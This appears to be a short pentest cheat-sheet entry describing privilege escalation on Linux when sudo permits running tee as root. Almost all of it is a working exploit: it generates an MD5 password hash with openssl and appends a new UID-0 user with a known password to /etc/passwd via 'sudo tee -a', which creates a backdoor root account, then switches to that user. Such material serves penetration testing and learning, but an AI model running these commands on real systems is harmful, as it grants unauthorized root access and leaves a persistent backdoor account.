Sudo Tee Privilege Escalation
Last modified: 2023-02-26
Sudo tee command is vulnerable to privilege escalation.
Investigation
(root) NOPASSWD: /usr/bin/tee
If we can execute tee
command as root, we can escalate to privilege.
Exploitation
1. Create a New Password for New User
Assume the new username is "tester".
# -1: MD5 algorithm
# -salt: Use privided salt -> The new username here
openssl passwd -1 -salt "tester" "password123"
# Output: $1$tester$LvsygQ2GEt7VUJQEqhMLf/
Copy the output password.
2. Write New Line with Tee
Paste the password in printf
and overwrite /etc/passwd
using tee
command.
printf 'tester:$1$tester$LvsygQ2GEt7VUJQEqhMLf/:0:0:root:/root:/bin/bash\n' | sudo tee -a /etc/passwd
3. Switch to New User
Now the new user was created.
We can switch to the new user.
su tester
password: password123